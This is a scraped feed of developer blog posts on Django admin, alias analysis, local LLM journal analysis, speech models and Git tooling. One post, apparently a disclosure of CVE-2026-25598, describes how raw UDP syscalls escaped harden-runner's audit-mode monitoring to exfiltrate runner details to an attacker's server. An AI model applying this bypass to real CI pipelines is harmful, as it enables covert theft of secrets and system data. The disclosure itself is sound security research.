social media or link site! Share it with friends! Hit subscribe to get new posts delivered to your inbox automatically. Feedback? Get in touch ! Doing my best to take care of the people. Doing what the business needs most at the given moment. Providing value to customers.

1 views
Justin Duke 1 weeks ago

Outgrowing Django admin

For a bit of dessert work this week, I'm working on a full-fledged attempt at replacing the majority of our stock Django admin usage with something purposeful. I say majority and not totality because even though I am an unreasonable person, I am not that unreasonable. We have over a hundred Django models, and the idea of trying to rip and replace each and every one of them — or worse yet, to design some sort of DSL by which we do that — is too quixotic even for me. The vast majority of our admin usage coalesces around three main models, and they're the ones you might guess: the user/newsletter model, the email model, and the subscriber model. My hope is that building out a markedly superior interface for interacting with these three things and sacrificing the long tail still nets out for a much happier time for myself and the support staff. Django admin is a source of both much convenience as much frustration: the abstractions make it powerful and cheap when you're first scaling, but the bill for those abstractions come due in difficult and intractable ways. When I talk with other Django developers, they divide cleanly into one of two camps: either "what are you talking about, Django admin is perfect as-is" or "oh my God, I can't believe we didn't migrate off of it sooner." Ever the annoying centrist, I find myself agreeing with both camps: Let's set aside the visual design of the admin for a second, because arguing about visual design is not compelling prose. To me, the core issue with Django's admin interface, once you get more mature, is the fact that it's a very simple request-response lifecycle. Django pulls all the data, state, and information you might need and throws it up to a massive behemoth view for you to digest and interact with. It is by definition atomic: you are looking at a specific model, and the only way to bring in other models to the detail view is by futzing around with inlines and formsets. The classic thing that almost any Django developer at scale has run into is the N+1 problem — but not even necessarily the one you're thinking about. Take a fairly standard admin class: If you've got an email admin object and one of the fields on the is a — because you want to be able to change and see which user wrote a given email — Django by default will serialize every single possible user into a nice tag for you. Even if this doesn't incur a literal N+1, you're asking the backend to generate a select with thousands (or more) options; the serialization overhead alone will timeout your request. And so the answer is, nowadays, to use or , which pulls in a jQuery 1.9 package 1 Yes, in 2026. No, I don't want to talk about it. to call an Ajax endpoint instead: This is the kind of patch that feels like a microcosm of the whole problem: technically correct, ergonomically awkward, and aesthetically offensive. But the deeper issue is composability rather than performance. A well-defined data model has relationships that spread in every direction. A subscriber has Stripe subscriptions and Stripe charges. It has foreign keys onto email events and external events. When you're debugging an issue reported by a subscriber, you want to see all of these things in one place, interleaved and sorted chronologically. Django admin's answer to this is inlines: This works — until it doesn't. You start to run into pagination issues; you can't interleave those components with one another because they're rendered as separate, agnostic blocks; you can't easily filter or search within a single inline. You could create a helper method on the subscriber class to sort all related events and present them as a single list, but you once again run into the non-trivial problem of this being part of a fixed request-response lifecycle. And that kind of serialized lookup can get really expensive: You can do more bits of cleverness — parallelizing lookups, caching aggressively, using and everywhere — but now you're fighting the framework rather than using it. The whole point of Django admin was to not build this stuff from scratch, and yet here you are, building bespoke rendering logic inside callbacks. I still love Django admin. On the next Django project I start, I will not create a bespoke thing from day one but instead rely on my trusty, outdated friend until it's no longer bearable. But what grinds my gears is the fact that, as far as I can tell, every serious Django company has this problem and has had to solve it from scratch. There's no blessed graduation path, whether in the framework itself or the broader ecosystem. I think that's one of the big drawbacks of Django relative to its peer frameworks. As strong and amazing as its community is, it's missing a part of the flywheel from more mature deployments upstreaming their findings and discoveries back into the zeitgeist. Django admin is an amazing asset; I am excited to be, if not rid of it, to be seeing much less of it in the future.

0 views
Max Bernstein 1 weeks ago

Type-based alias analysis in the Toy Optimizer

Another entry in the Toy Optimizer series . Last time, we did load-store forwarding in the context of our Toy Optimizer. We managed to cache the results of both reads from and writes to the heap—at compile-time! We were careful to mind object aliasing: we separated our heap information into alias classes based on what offset the reads/writes referenced. This way, if we didn’t know if object and aliased, we could at least know that different offsets would never alias (assuming our objects don’t overlap and memory accesses are on word-sized slots). This is a coarse-grained heuristic. Fortunately, we often have much more information available at compile-time than just the offset, so we should use it. I mentioned in a footnote that we could use type information, for example, to improve our alias analysis. We’ll add a lightweight form of type-based alias analysis (TBAA) (PDF) in this post. We return once again to Fil Pizlo land, specifically How I implement SSA form . We’re going to be using the hierarchical heap effect representation from the post in our implementation, but you can use your own type representation if you have one already. This representation divides the heap into disjoint regions by type. Consider, for example, that objects and objects do not overlap. A pointer is never going to alias an pointer. They can therefore be reasoned about separately. But sometimes you don’t have perfect type information available. If you have in your language an base class of all objects, then the heap overlaps with, say, the heap. So you need some way to represent that too—just having an enum doesn’t work cleanly. Here is an example simplified type hierarchy: Where might represent different parts of the runtime’s data structures, and could be further segmented into , , etc. Fil’s idea is that we can represent each node in that hierarchy with a tuple of integers (inclusive, exclusive) that represent the pre- and post-order traversals of the tree. Or, if tree traversals are not engraved into your bones, they represent the range of all the nested objects within them. Then the “does this write interfere with this read” check—the aliasing check—is a range overlap query. Here’s a perhaps over-engineered Python implementation of the range and heap hierarchy based on the Ruby generator and C++ runtime code from JavaScriptCore: Where kicks off the tree-numbering scheme. Fil’s implementation also covers a bunch of abstract heaps such as SSAState and Control because his is used for code motion and whatnot. That can be added on later but we will not do so in this post. So there you have it: a type representation. Now we need to use it in our load-store forwarding. Recall that our load-store optimization pass looks like this: At its core, it iterates over the instructions, keeping a representation of the heap at compile-time. Reads get cached, writes get cached, and writes also invalidate the state of compile-time information about fields that may alias. In this case, our may alias asks only if the offsets overlap. This means that the following unit test will fail: This test is expecting the write to to still remain cached even though we wrote to the same offset in —because we have annotated as being an and as being a . If we account for type information in our alias analysis, we can get this test to pass. After doing a bunch of fussing around with the load-store forwarding (many rewrites), I eventually got it down to a very short diff: If we don’t have any type/alias information, we default to “I know nothing” ( ) for each object. Then we check range overlap. The boolean logic in looks a little weird, maybe. But we can also rewrite (via DeMorgan’s law) as: So, keeping all the cached field state about fields that are known by offset and by type not to alias. Maybe that is clearer (but not as nice a diff). Note that the type representation is not so important here! You could use a bitset version of the type information if you want. The important things are that you can cheaply construct types and check overlap between them. Nice, now our test passes! We can differentiate between memory accesses on objects of different types. But what if we knew more? Sometimes we know where an object came from. For example, we may have seen it get allocated in the trace. If we saw an object’s allocation, we know that it does not alias (for example) any object that was passed in via a parameter. We can use this kind of information to our advantage. For example, in the following made up IR snippet: We know that (among other facts) doesn’t alias or because we have seen its allocation site. I saw this in the old V8 IR Hydrogen’s lightweight alias analysis 1 : There is plenty of other useful information such as: If you have other fun ones, please write in. We only handle loads and stores in our optimizer. Unfortunately, this means we may accidentally cache stale information. Consider: what happens if a function call (or any other opaque instruction) writes into an object we are tracking? The conservative approach is to invalidate all cached information on a function call. This is definitely correct, but it’s a bummer for the optimizer. Can we do anything? Well, perhaps we are calling a well-known function or a specific IR instruction. In that case, we can annotate it with effects in the same abstract heap model: if the instruction does not write, or only writes to some heaps, we can at least only partially invalidate our heap. However, if the function is unknown or otherwise opaque, we need at least more advanced alias information and perhaps even (partial) escape analysis. Consider: even if an instruction takes no operands, we have no idea what state it has access to. If it writes to any object A, we cannot safely cache information about any other object B unless we know for sure that A and B do not alias. And we don’t know what the instruction writes to. So we may only know we can cache information about B because it was allocated locally and has not escaped. Some runtimes such as ART pre-compute all of their alias information in a bit matrix. This makes more sense if you are using alias information in a full control-flow graph, where you might need to iterate over the graph a few times. In a trace context, you can do a lot in one single pass—no need to make a matrix. As usual, this is a toy IR and a toy optimizer, so it’s hard to say how much faster it makes its toy programs. In general, though, there is a dial for analysis and optimization that goes between precision and speed. This is a happy point on that dial, only a tiny incremental analysis cost bump above offset-only invalidation, but for higher precision. I like that tradeoff. Also, it is very useful in JIT compilers where generally the managed language is a little better-behaved than a C-like language . Somewhere in your IR there will be a lot of duplicate loads and stores from a strength reduction pass, and this can clean up the mess. Thanks for joining as I work through a small use of type-based alias analysis for myself. I hope you enjoyed. Thank you to Chris Gregory for helpful feedback. I made a fork of V8 to go spelunk around the Hydrogen IR. I reset the V8 repo to the last commit before they deleted it in favor of their new Sea of Nodes based IR called TurboFan.  ↩ If we know at compile-time that object A has 5 at offset 0 and object B has 7 at offset 0, then A and B don’t alias (thanks, CF) In the RPython JIT in PyPy, this is used to determine if two user (Python) objects don’t alias because we know the contents of the user (Python) class field Object size (though perhaps that is a special case of the above bullet) Field size/type Deferring alias checks to run-time Have a branch I made a fork of V8 to go spelunk around the Hydrogen IR. I reset the V8 repo to the last commit before they deleted it in favor of their new Sea of Nodes based IR called TurboFan.  ↩

0 views
Rik Huijzer 2 weeks ago

Running `deezer/spleeter`

Here are up-to-date installation instructions for running Deezer's Spleeter on `Ubuntu 24.04`. Minimum requirements are around 16 GB of RAM. (During the processing, it uses around 11 GB at the peak.) I ran this on a temporary Hetzner server because my Apple Silicon system, after lots of fiddling with version, ran into AVX issues. Install Conda. ``` conda create -n spleeter_env python=3.8 -y ``` ``` conda activate spleeter_env ``` ``` conda install -c conda-forge ffmpeg libsndfile numpy=1.19 -y ``` ``` pip install spleeter ``` ``` spleeter separate -o audio_output input.mp3 ``` If your a...

0 views
Ankur Sethi 2 weeks ago

I used a local LLM to analyze my journal entries

In 2025, I wrote 162 journal entries totaling 193,761 words. In December, as the year came to a close and I found myself in a reflective mood, I wondered if I could use an LLM to comb through these entries and extract useful insights. I’d had good luck extracting structured data from web pages using Claude, so I knew this was a task LLMs were good at. But there was a problem: I write about sensitive topics in my journal entries, and I don’t want to share them with the big LLM providers. Most of them have at least a thirty-day data retention policy, even if you call their models using their APIs, and that makes me uncomfortable. Worse, all of them have safety and abuse detection systems that get triggered if you talk about certain mental health issues. This can lead to account bans or human review of your conversations. I didn’t want my account to get banned, and the very idea of a stranger across the world reading my journal mortifies me. So I decided to use a local LLM running on my MacBook for this experiment. Writing the code was surprisingly easy. It took me a few evenings of work—and a lot of yelling at Claude Code—to build a pipeline of Python scripts that would extract structured JSON from my journal entries. I then turned that data into boring-but-serviceable visualizations. This was a fun side-project, but the data I extracted didn’t quite lead me to any new insights. That’s why I consider this a failed experiment. The output of my pipeline only confirmed what I already knew about my year. Besides, I didn’t have the hardware to run the larger models, so some of the more interesting analyses I wanted to run were plagued with hallucinations. Despite how it turned out, I’m writing about this experiment because I want to try it again in December 2026. I’m hoping I won’t repeat my mistakes again. Selfishly, I’m also hoping that somebody who knows how to use LLMs for data extraction tasks will find this article and suggest improvements to my workflow. I’ve pushed my data extraction and visualization scripts to GitHub. It’s mostly LLM-generated slop, but it works. The most interesting and useful parts are probably the prompts . Now let’s look at some graphs. I ran 12 different analyses on my journal, but I’m only including the output from 6 of them here. Most of the others produced nonsensical results or were difficult to visualize. For privacy, I’m not using any real names in these graphs. Here’s how I divided time between my hobbies through the year: Here are my most mentioned hobbies: This one is media I engaged with. There isn’t a lot of data for this one: How many mental health issues I complained about each day across the year: How many physical health issues I complained about each day across the year: The big events of 2025: The communities I spent most of my time with: Top mentioned people throughout the year: I ran all these analyses on my MacBook Pro with an M4 Pro and 48GB RAM. This hardware can just barely manage to run some of the more useful open-weights models, as long as I don’t run anything else. For running the models, I used Apple’s package . Picking a model took me longer than putting together the data extraction scripts. People on /r/LocalLlama had a lot of strong opinions, but there was no clear “best” model when I ran this experiment. I just had to try out a bunch of them and evaluate their outputs myself. If I had more time and faster hardware, I might have looked into building a small-scale LLM eval for this task. But for this scenario, I picked a few popular models, ran them on a subset of my journal entries, and picked one based on vibes. This project finally gave me an excuse to learn all the technical terms around LLMs. What’s quantization ? What does the number of parameters do? What does it mean when a model has , , , or in its name? What is a reasoning model ? What’s MoE ? What are active parameters? This was fun, even if my knowledge will be obsolete in six months. In the beginning, I ran all my scripts with Qwen 2.5 Instruct 32b at 8-bit quantization as the model. This fit in my RAM with just enough room left over for a browser, text editor, and terminal. But Qwen 2.5 didn’t produce the best output and hallucinated quite a bit, so I ran my final analyses using Llama-3.3 70B Instruct at 3bit quantization. This could just about fit in my RAM if I quit every other app and increased the amount of GPU RAM a process was allowed to use . While quickly iterating on my Python code, I used a tiny model: Qwen 3 4b Instruct quantized to 4bits. A major reason this experiment didn’t yield useful insights was that I didn’t know what questions to ask the LLM. I couldn’t do a qualitative analysis of my writing—the kind of analysis a therapist might be able to do—because I’m not a trained psychologist. Even if I could figure out the right prompts, I wouldn’t want to do this kind of work with an LLM. The potential for harm is too great, and the cost of mistakes is too high. With a few exceptions, I limited myself to extracting quantitative data only. From each journal entry, I extracted the following information: None of the models was as accurate as I had hoped at extracting this data. In many cases, I noticed hallucinations and examples from my system prompt leaking into the output, which I had to clean up afterwards. Qwen 2.5 was particularly susceptible to this. Some of the analyses (e.g. list of new people I met) produced nonsensical results, but that wasn’t really the fault of the models. They were all operating on a single journal entry at a time, so they had no sense of the larger context of my life. I couldn’t run all my journal entries through the LLM at once. I didn’t have that kind of RAM and the models didn’t have that kind of context window. I had to run the analysis one journal entry at a time. Even then, my computer choked on some of the larger entries, and I had to write my scripts in a way that I could run partial analyses or continue failed analyses. Trying to extract all the information listed above in one pass produced low-quality output. I had to split my analysis into multiple prompts and run them one at a time. Surprisingly, none of the models I tried had an issue with the instruction . Even the really tiny models had no problems following the instruction. Some of them occasionally threw in a Markdown fenced code block, but it was easy enough to strip using a regex. My prompts were divided into two parts: The task-specific prompts included detailed instructions and examples that made the structure of the JSON output clear. Every model followed the JSON schema mentioned in the prompt, and I rarely ever ran into JSON parsing issues. But the one issue I never managed to fix was the examples from the prompts leaking into the extracted output. Every model insisted that I had “dinner with Sarah” several times last year, even though I don’t know anybody by that name. This name came from an example that formed part of one of my prompts. I just had to make sure the examples I used stood out—e.g., using names of people I didn’t know at all or movies I hadn’t watched—so I could filter them out using plain old Python code afterwards. Here’s what my prompt looked like: To this prompt, I appended task-specific prompts. Here’s the prompt for extracting health issues mentioned in an entry: You can find all the prompts in the GitHub repository . The collected output from all the entries looked something like this: Since my model could only look at one journal entry at a time, it would sometimes refer to the same health issue, gratitude item, location, or travel destination using different synonyms. For example, “exhaustion” and “fatigue” should refer to the same health issue, but they would appear in the output as two different issues. My first attempt at de-duplicating these synonyms was to keep a running tally of unique terms discovered during each analysis and append them to the end of the prompt for each subsequent entry. Something like this: But this quickly led to some really strange hallucinations. I still don’t understand why. This list of terms wasn’t even that long, maybe 15-20 unique terms for each analysis. My second attempt at solving this was a separate normalization pass for each analysis. After an analysis finished running, I extracted a unique list of terms from its output file and collected them into a prompt. Then asked the LLM to produce a mapping to de-duplicate the terms. This is what the prompt looked like: There were better ways to do this than using an LLM. But you know what happens when all you have is a hammer? Yep, exactly. The normalization step was inefficient, but it did its job. This was the last piece of the puzzle. With all the extraction scripts and their normalization passes working correctly, I left my MacBook running the pipeline of scripts all day. I’ve never seen an M-series MacBook get this hot. I was worried that I’d damage my hardware somehow, but it all worked out fine. There was nothing special about this step. I just decided on a list of visualizations for the data I’d extracted, then asked Claude to write some code to generate them for me. Tweak, rinse, repeat until done. I’m underwhelmed by the results of this experiment. I didn’t quite learn anything new or interesting from the output, at least nothing I didn’t already know. This was only partly because of LLM limitations. I believe I didn’t quite know what questions to ask in the first place. What was I hoping to discover? What kinds of patterns was I looking for? What was the goal of the experiment besides producing pretty graphs? I went into the project with a cool new piece of tech to try out, but skipped the important up-front human-powered thinking work required to extract good insights from data. I neglected to sit down and design a set of initial questions I wanted to answer and assumptions I wanted to test before writing the code. Just goes to show that no amount of generative AI magic will produce good results unless you can define what success looks like. Maybe this year I’ll learn more about data analysis and visualization and run this experiment again in December to see if I can go any further. I did learn one thing from all of this: if you have access to state-of-the-art language models and know the right set of questions to ask, you can process your unstructured data to find needles in some truly massive haystacks. This allows you analyze datasets that would take human reviewers months to comb through. A great example is how the NYT monitors hundreds of podcasts every day using LLMs. For now, I’m putting a pin in this experiment. Let’s try again in December. List of things I was grateful for, if any List of hobbies or side-projects mentioned List of locations mentioned List of media mentioned (including books, movies, games, or music) A boolean answer to whether it was a good or bad day for my mental health List of mental health issues mentioned, if any A boolean answer to whether it was a good or bad day for my physical health List of physical health issues mentioned, if any List of things I was proud of, if any List of social activities mentioned Travel destinations mentioned, if any List of friends, family members, or acquaintances mentioned List of new people I met that day, if any A “core” prompt that was common across analyses Task-specific prompts for each analysis

0 views
Pete Warden 2 weeks ago

Announcing Moonshine Voice

Today we’re launching Moonshine Voice , a new family of on-device speech to text models designed for live voice applications, and an open source library to run them . They support streaming , doing a lot of the compute while the user is still talking so your app can respond to user speech an order of magnitude faster than alternatives , while continuously supplying partial text updates. Our largest model has only 245 million parameters , but achieves a 6.65% word error rate on HuggingFace’s OpenASR Leaderboard compared to Whisper Large v3 which has 1.5 billion parameters and a 7.44% word error rate. We are optimized for easy integration with applications, with prebuilt packages and examples for iOS , Android , Python , MacOS , Windows , Linux , and Raspberry Pis . Everything runs on the CPU with no NPU or GPU dependencies. and the code and streaming models are released under an MIT License . We’ve designed the framework to be “batteries included”, with microphone capture, voice activity detection, speaker identification (though our diarization has room for improvement), speech to text, and even intent recognition built-in, and available through a common API on all platforms. As you might be able to tell, I’m pretty excited to share this with you all! We’ve been working on this for the last 18 months, and have been dogfooding it in our own products, and I can’t wait to see what you all build with it. Please join our Discord if you have questions, and if you do find it useful, please consider giving the repository a star on GitHub, that helps us a lot.

0 views
ava's blog 2 weeks ago

focus timer

I recently felt like I couldn't trust my own judgment anymore about how much time I put into things. I could sit on my desk for 8 hours, but did I really study that much? Work that much? Volunteer that much? Blog that much? What about my breaks (chatting, videos, toilet, kitchen)? Even if I felt like I did a lot that day, I wasn't sure how much already, since so much bled together. I do not work in fixed increments (Pomodoro etc.) or set specific times when to start something. I just flow from one thing to another. I could summarize and translate a case, and then midway take a break to chat or watch a video, which then could inspire a blog post I'd write, and then I make some food, I have an idea for some pixel art and draw it, then after that I start studying, and when I need a break I continue the case again... it sounds a bit messier than it is in practice. It warps my perception though, especially because it all happens in the same location and on the same device. So I needed a lightweight timer that would keep the time, let me label it, and then log it in a file. In the end, I could see how much I did of each thing in the file. I asked for recommendations first, then couldn't really find what I was looking for otherwise, so I settled on AI-generating a solution for me. I couldn't add learning Python onto my busy schedule and waste it on a measly timer when I should be doing other things, and I needed it right that day, so I thought that's the perfect dirty work for an LLM for once. The timer has a 'Start' button that switches to 'Pause' once it is pressed, and 'Stop' opens a dialogue window to assign a label (= type in a word). After a label is assigned, it gets saved to a . In the CSV file, it shows date, current local time, the given label, and the timer time. The way this is read depends on your locale and how you set the separator options. For me, it is set like this: Different locale or separator detection can show the numbers in separate columns instead. If anyone needs it, here is the AI-generated code with some manual edits by me (added symbols, adjusted how date and time is displayed in the CSV). Probably silly as hell code, but what do I know. Put it into a file called and allow it to run as executable. Reply via email Published 13 Feb, 2026

0 views
Justin Duke 2 weeks ago

One status field per model

Any sufficiently old application starts to succumb to a pernicious form of technical debt known in street parlance as shitty data modeling . Sometimes this manifests as the god object: a single model that represents the user, and the settings, and the DNS configuration, and twelve other things. Sometimes this comes in the form of a table (or multiple tables) where the initial set of data modeling concerns in the early goings of the project don't quite match the reality discovered along the way, and a series of subtle mismatches collide with each other in the same way that subtle mismatches between tectonic plates do. Data models, unlike other areas of tech debt, are correctly scary to refactor. Even in Django — an application framework with really robust, mature migration tooling — reshaping data in production is non-trivial. The weight associated with even relatively simple schema changes can be so overwhelming as to forever dissuade a would-be re-architect from making things right. Therefore, it is that much more important to spend the extra mental energy early on to make sure, whenever possible, your data model is a roughly correct one, and to course correct early when it isn't. There are many ways to do this, and the goal of describing a virtuous data model in its entirety is too large and broad a problem for this measly little essay. Instead, I want to share a heuristic that I have found particularly useful — one which is summed up, as many of my blog posts are, in the title. Every data model must have at most one status field. If you're thinking about making a change such that a model has more than one status field, you have the wrong data model. Let me illustrate via self-flagellation and talk about Buttondown's own problematic model: the object. The object has three status fields within its lush, expansive confines: This is incorrect. We should have created standalone models for the sending domain and hosting domain, each with a simple field of its own, and drawn foreign keys from the onto those. We did not do this, because at the time it felt like overkill. And so. You pay the price — not in any one specific bug, but in weirdness , in the difficulty of reasoning about the code. Is there a meaningful difference between an status and a of for an active newsletter, versus an status and a of ? What queries should return which combinations? The confusion compounds. Again, I know this sounds trivial. But every good data model has syntactic sugar around the state machine, and every good state machine has a unary representation of its state. 1 See also: enums . A field (the normal one)

0 views
devansh 2 weeks ago

[CVE-2026-25598] Bypassing Outbound Connections Detection in harden-runner

GitHub Actions have become a prime vector for supply chain attacks , with attackers exploiting workflow misconfigurations to exfiltrate secrets, deploy malware, or pivot to downstream CI/CD pipelines. Notable incidents, such as the widespread compromise of tj-actions/changed-files in March 2025 (which affected over 23,000 repositories and leaked secrets via modified action versions) highlight this risk. Ephemeral runners can leak sensitive data if outbound traffic is not tightly controlled. Egress traffic —outbound connections from workflows—remains a significant blind spot, enabling data theft through techniques such as DNS tunneling, HTTP beacons, or raw socket communication. To mitigate these threats, the ecosystem has spawned specialized GitHub Actions focused on runner hardening. We will discuss about one such action i.e. Step Security's It is a widely adopted CI/CD security agent that functions similarly to an endpoint detection and response (EDR) tool for GitHub Actions runners. It monitors network egress, enforces domain/IP allowlists, audits file integrity, and detects process anomalies in real time, including in untrusted workflows triggered by pull requests or issue comments. Tools like these often utilize eBPF hooks or iptables to enforce network policies at runtime. They aim to provide "set-it-and-forget-it" protection by detecting and preventing exfiltration attempts. These controls are particularly valuable in public repositories or environments where third-party actions and untrusted contributions introduce elevated risk. Harden-runner monitors outbound connections through network syscalls. Most tools and commands trigger detectable patterns. But UDP, with its connectionless nature, presented an interesting attack surface. some UDP syscalls behave differently enough that they fall outside the monitoring scope. What follows are three practical techniques that exploited this gap. Note: This vulnerability only affected audit mode. When using egress-policy: block, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies) Affected Versions A minimal PoC for demonstrating how to evade harden-runner and make outbound connections + exfil data 1- Set up a GitHub repo with the following workflow: 2- Spin up a VPS, obtain public IPv4 3- Run the following Python UDP Server 4- Open a Issue in the repository, and add the following comment: Note: Replace with your VPS IP address (where UDP listener is running) 5- Runner name and OS version will be exfiltrated to your VPS's UDP listener 6- No outbound connection to your VPS will be detected by StepSecurity The payload uses to output a complete, compilable C source file to , which is then compiled with and executed. The generated source code is as follows (with minor formatting for clarity): What it does? The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code is as follows (with minor formatting for clarity): What it does? The payload executes a shell command that leverages to generate a complete, compilable C source file and redirect it to . This file is subsequently compiled using into an executable named , which is then run immediately. The generated source code requires for support and is as follows (with minor formatting for clarity): What it does? These bypasses highlight a fundamental challenge in CI/CD security monitoring, the gap between what tools observe and what the underlying system permits. While effectively monitors common network patterns through standard syscalls like and high-level APIs, the raw socket interface—particularly UDP's connectionless syscalls presented a harder detection problem. The three techniques demonstrated ( , , and ) exploit this blind spot not through sophisticated evasion, but by leveraging legitimate kernel interfaces that fall outside the monitoring scope. Key Takeaways: GitHub Advisory: CVE-2026-25598 The vulnerability has been patched in harden-runner v2.14.2 for the Community Tier. CVE-2026-25598 Bypass using sendto Bypass using sendmsg Bypass using sendmmsg Closing Thoughts Harden-Runner Community Tier: All versions prior to v2.14.2 Harden-Runner Enterprise Tier: NOT AFFECTED Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via without establishing a connection. Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via using an and structure without establishing a connection. Creates a UDP socket. Prepares a destination address structure for the specified IP and port 1053. Collects system details using and . Formats a message (e.g., "R:hostname,O:Linux 5.15.0"). Sends the message via using an structure (wrapping a single with ) without establishing a connection; designed for batch sending but used here for one message. Closes the socket. Audit mode has inherent limitations : These bypasses only affect audit mode. The block mode properly prevents these connections, reinforcing that enforcement is more effective than observation alone. UDP monitoring is harder than TCP : The connectionless nature of UDP means there's no "connection establishment" phase to hook into, making detection more challenging.

0 views
matduggan.com 2 weeks ago

GitButler CLI Is Really Good

My workflow has remained mostly the same for over a decade. I write everything in Vim using the configuration found here . I run Vim from inside of tmux with a configuration found here . I write things on a git branch, made with the CLI, then I add them with to that branch, trying to run all of the possible linting and tests with before I waste my time on GitHub Actions. Then I run which is an alias to . Finally I successfully commit, then I copy paste the URL returned by GitHub to open a PR. Then I merge the PR and run to go back to the primary branch, which is an alias to . This workflow, I think, is pretty familiar for anyone working with GitHub a lot. Now you'll notice I'm not saying because almost nothing I'm doing has anything to do with . There's no advantage to my repo being local to my machine, because everything I need to actually merge and deploy code lives on GitHub. The CI runs there, the approval process runs there, the monitoring of the CI happens there, the injection of secrets happens there. If GitHub is down my local repo does, effectively, nothing. My source of truth is always remote, which means I pay the price for complexity locally but I don't benefit from it. At most jobs: This means the following is also true: Almost all the features of are wasted on me in this flow. Now because this tool serves a million purposes and is designed to operate in a way that almost nobody uses it for, we all pay the complexity price of and never reap any of the benefits. So instead I keep having to add more aliases to paper over the shortcomings of . These are all the aliases I use at least once a week. Git's offline-first design creates friction for online-first workflows, and GitButler CLI eliminates that friction by being honest about how we actually work. (Edit: I forgot to add this disclaimer. I am not, nor have ever been an employee/investor/best friends with anyone from GitButler. They don't care that I've written this and I didn't communicate with anyone from that team before I wrote this.) So let's take the most basic command as an example. This is my flow that I do 2-3 times a day without my aliases. I do this because can't make assumptions about the state of the world. However because GitButler is designed with the assumption that I'm working online, we can skip a lot of this nonsense. It's status command understands that there is always a remote main that I care about and that when I run a status that I need to understand my status relative to the remote main as it exists right now. Not how it existed the last time I remembered to pull. However this is far from the best trick it has up its sleeve. You're working on a feature, notice an unrelated bug, and now you have to stash, checkout, fix, commit, push, checkout back, stash pop. Context switching is expensive and error-prone. GitButler effectively hacks a solution into that fixes this with multiple branches applied simultaneously. Assign files to different branches without leaving your workspace. What do I mean by that. Let's start again with my status Great looks good. Alright so lets say I make 2 new branches. I'm working on a new feature for adding auth and while I'm working on that, I see a typo I need to fix in a YAML. I can work on both things at the same time: And easily commit to both at the same time without doing anything weird . Stacked PRs are the "right" way to break up large changes so people on your team don't throw up at being asked to review 2000 lines, but Git makes them miserable. When the base branch gets feedback, you have to rebase every dependent branch, resolve conflicts, force-push, and pray. Git doesn't understand branch dependencies. It treats every branch as independent, so you have to manually maintain the stack. GitButler solves this problem with First-class stacked branches. The dependency is explicit, and updates propagate automatically. So what do I mean. Let's say I make a new API endpoint in some Django app. First I make the branch. So let's say I'm working on the branch and get some good feedback on my PR. It's easy to resolve the comments there while leaving my branched off this as a stacked thing that understands the relationship back to the first branch as shown here. In practice this is just a much nicer way of dealing with a super common workflow. Maybe the most requested feature from new users I encounter is an easier undo. When you mess up in Git, recovery means diving into , understanding the cryptic output, and hoping you pick the right . One wrong move and you've made it worse. GitButlers is just easier to use. So the basic undo functionality is super simple to understand. rolls me back one operation. To me the mental model of a snapshot makes a lot more sense than the git history model. I do an action, I want to undo that action. This is better than the git option of: I've been using GitButler in my daily work since I got the email that the CLI was available and I've really loved it. I'm a huge fan of what this team is doing to effectively remodel and simplify Git operations in a world where almost nobody is using it in the way the tool was originally imagined to be used. I strongly encourage folks go check it out for free at: https://docs.gitbutler.com/cli-guides/cli-tutorial/tutorial-overview . It does a ton of things (like help you manage PRs) that I didn't even touch on here. Let me know if you find something cool that I forgot at: https://c.im/@matdevdug You can't merge without GitHub (PRs are the merge mechanism) You can't deploy without GitHub (Actions is the deployment trigger) You can't get approval without GitHub (code review lives there) Your commits are essentially "drafts" until they exist on GitHub You never work disconnected intentionally You don't use local branches as long-lived divergent histories You don't merge locally between branches (GitHub PRs handle this) You don't use for archaeology — you use GitHub's blame/history UI (I often use git log personally but I have determined I'm in the minority on this). Your local repo might be offline for days or weeks The "remote" might be someone else's laptop, not a central server Divergent histories are expected and merging is a deliberate, considered act

0 views
Armin Ronacher 2 weeks ago

A Language For Agents

Last year I first started thinking about what the future of programming languages might look like now that agentic engineering is a growing thing. Initially I felt that the enormous corpus of pre-existing code would cement existing languages in place but now I’m starting to think the opposite is true. Here I want to outline my thinking on why we are going to see more new programming languages and why there is quite a bit of space for interesting innovation. And just in case someone wants to start building one, here are some of my thoughts on what we should aim for! Does an agent perform dramatically better on a language that it has in its weights? Obviously yes. But there are less obvious factors that affect how good an agent is at programming in a language: how good the tooling around it is and how much churn there is. Zig seems underrepresented in the weights (at least in the models I’ve used) and also changing quickly. That combination is not optimal, but it’s still passable: you can program even in the upcoming Zig version if you point the agent at the right documentation. But it’s not great. On the other hand, some languages are well represented in the weights but agents still don’t succeed as much because of tooling choices. Swift is a good example: in my experience the tooling around building a Mac or iOS application can be so painful that agents struggle to navigate it. Also not great. So, just because it exists doesn’t mean the agent succeeds and just because it’s new also doesn’t mean that the agent is going to struggle. I’m convinced that you can build yourself up to a new language if you don’t want to depart everywhere all at once. The biggest reason new languages might work is that the cost of coding is going down dramatically. The result is the breadth of an ecosystem matters less. I’m now routinely reaching for JavaScript in places where I would have used Python. Not because I love it or the ecosystem is better, but because the agent does much better with TypeScript. The way to think about this: if important functionality is missing in my language of choice, I just point the agent at a library from a different language and have it build a port. As a concrete example, I recently built an Ethernet driver in JavaScript to implement the host controller for our sandbox. Implementations exist in Rust, C, and Go, but I wanted something pluggable and customizable in JavaScript. It was easier to have the agent reimplement it than to make the build system and distribution work against a native binding. New languages will work if their value proposition is strong enough and they evolve with knowledge of how LLMs train. People will adopt them despite being underrepresented in the weights. And if they are designed to work well with agents, then they might be designed around familiar syntax that is already known to work well. So why would we want a new language at all? The reason this is interesting to think about is that many of today’s languages were designed with the assumption that punching keys is laborious, so we traded certain things for brevity. As an example, many languages — particular modern ones — lean heavily on type inference so that you don’t have to write out types. The downside is that you now need an LSP or the resulting compiler error messages to figure out what the type of an expression is. Agents struggle with this too, and it’s also frustrating in pull request review where complex operations can make it very hard to figure out what the types actually are. Fully dynamic languages are even worse in that regard. The cost of writing code is going down, but because we are also producing more of it, understanding what the code does is becoming more important. We might actually want more code to be written if it means there is less ambiguity when we perform a review. I also want to point out that we are heading towards a world where some code is never seen by a human and is only consumed by machines. Even in that 